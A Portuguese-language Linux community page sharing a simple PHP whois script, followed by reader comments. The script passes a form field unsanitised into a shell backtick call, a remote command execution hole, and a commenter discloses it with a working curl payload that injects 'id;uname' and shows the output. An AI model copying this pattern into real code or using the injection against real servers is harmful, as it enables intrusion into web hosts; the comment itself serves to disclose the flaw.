Whois em PHP

Publicado por Perfil removido (última atualização em 14/11/2012)

[ Hits: 7.750 ]

Download whoisphp.php

0 0
Denuncie   Favoritos   Indicar  



Script simples em PHP para consulta whois.

  



Esconder código-fonte

<?php

/*
 * Scripit PHP para gerar whois 
 * 
 *  code by @Kouback_TR_
 *  http://koubacktr.com/
 *  http://twitter.com/kouback_tr_
 */
  
print"
<title>PHP-Kouback-Whois</title>
<body bgcolor=#000000>
<center><b><font size=6><font color=#FFFFFF>-=Whois=-</font></font></b></center>
<form method='post' action='?action=whois'>
<br>
<b><center><font color=#FFFFFF>Target whois</font></center></b>
<center><input type=text name=target></input></center></pre>
<center><input type=submit value='whois'></input></center>
<br><br><br><br>";

if($_GET['action'] == "whois"){
   
$target = $_POST['target'];
$whois = `whois $target && arp -a`;
print"
<CENTER><TABLE DIR=LTR WIDTH=50% BORDER=1 CELLPADDING=4 CELLSPACING=3><COL WIDTH=256*><TR><TD WIDTH=100% VALIGN=TOP><P><font color=#00FF14 size=2>";
echo nl2br($whois);
print"</P></TD></TR></TABLE></CENTER>";
}

?>

Scripts recomendados

Resolvendo IP para Hostname em PHP

Babelfish Translator

PHP Script para testar ping de varios enderecoes em arquivo TXT

Cria gráficos para monitoramento de consumo de CPU e Memória a partir de arquivos [Atualização].

PortScan em PHP com post usando fsockopen


  

Comentários
[1] Comentário enviado por fvox em 14/11/2012 - 10:06h

Hi.

Muito cuidado ao usar backticks pois é uma alias para a função shell_exec().
Seu código apresenta uma vulnerabilidade conhecida como RCE (Remote Code Execution).

Exploit:
:~$ curl -s "http://localhost/whois.php?action=whois" --data "target=whois fvox; id;uname -srmo #"
[...]
No whois server is known for this kind of object.<br />
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)<br />
Linux 2.6.xx-xx-generic x86_64 GNU/Linux<br />

[2] Comentário enviado por removido em 14/11/2012 - 19:27h

Obrigado amigo pela dica, e parabéns pela otima visão da falha, a internet precisa de mais gente como vc


Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Modo Simples de Baixar e Usar o bash-completion

Instalar/habilitar o Linux nativo dentro do Windows com WSL (Windows Subsystem for Linux - Subsistema do Windows para Linux)

Monitorando o Preço do Bitcoin ou sua Cripto Favorita em Tempo Real com um Widget Flutuante

Conhecendo o openSUSE Kalpa

IA Turbina o Desktop Linux enquanto distros renovam forças

Dicas

Instalando partes faltantes do Plasma 6

Adicionar botão "mostrar área de trabalho" no Zorin OS

Como montar um servidor de backup no linux

Trazendo de volta o Serviços em Segundo Plano no Plasma6

Ativando e usando "zoom" no ambiente Cinnamon

Tópicos

Desenvolvi um programa de hot corner (você colocar o mouse nos cantos)... (2)

key flag (2)

Problema com uso do sed [RESOLVIDO] (3)

KDE Linux, alguém? (3)

Atualizei meu ubuntu e desliguei e ele não inicia corretamente (13)

Top 10 do mês

Scripts

[Shell Script] Task Manager para Terminal

[Shell Script] Atualizar Debian versão 2.0

[Shell Script] fuckdrive - zerador de unidades

[Shell Script] Script para atualizar o Debian 13

[Shell Script] Script para teste de THP no sistema

A maior comunidade GNU/Linux da América Latina! Artigos, dicas, tutoriais, fórum, scripts e muito mais. Ideal para quem busca auto-ajuda.

Site hospedado por: